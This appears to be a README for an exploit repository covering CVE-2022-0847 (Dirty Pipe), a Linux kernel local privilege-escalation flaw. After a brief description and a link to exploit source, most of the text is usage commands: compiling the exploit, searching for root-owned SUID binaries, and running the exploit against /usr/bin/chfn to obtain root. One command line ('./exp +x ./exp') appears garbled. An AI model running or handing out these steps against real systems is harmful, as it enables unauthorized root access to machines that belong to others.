
CVE-2022-0847-DirtyPipe-Exploit
El 7 de marzo, el investigador de seguridad extranjero Max Kellermann publicó un blog revelando una vulnerabilidad de escalada de privilegios local en el kernel de Linux, CVE-2022-0847: https://dirtypipe.cm4all.com/
CVE-2022-0847 es una vulnerabilidad de escalada de privilegios local presente en el kernel de Linux 5.8 y versiones posteriores. Al explotar esta vulnerabilidad, un atacante puede sobrescribir datos en cualquier archivo legible, elevando así los permisos de un usuario normal a root privilegiado.
El principio de la vulnerabilidad CVE-2022-0847 es similar al de CVE-2016-5195 Dirty Cow, pero es más fácil de explotar. El autor de la vulnerabilidad la denominó 'Dirty Pipe'.
Link: https://haxx.in/files/dirtypipez.c
Author: Max Kellermann [email protected]
gcc -o exp exploit.c
./exp +x ./exp
# 查找suid文件
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;
./exp /usr/bin/chfn
